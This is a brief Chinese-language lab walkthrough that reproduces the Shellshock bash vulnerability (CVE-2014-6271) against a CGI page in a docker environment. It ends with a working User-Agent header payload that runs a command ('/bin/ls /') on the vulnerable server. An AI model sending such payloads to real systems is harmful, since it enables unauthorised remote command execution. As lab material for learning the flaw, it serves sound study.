Shellshock 远程命令注入 （CVE-2014-6271）漏洞复现

漏洞描述

Safe.cgi 由最新版本的 bash 生成，victim.cgi 是 bash4.3 生成的页面，容易受到 shellshock 的影响。

我们可以在访问 victim.cgi 时在用户代理字符串中发送包含我们的有效负载，并且命令成功执行

漏洞环境及利用

搭建docker环境

访问ip:8080/victim.cgi 抓包修改UA头

() { :;};echo ; echo; echo $(/bin/ls /);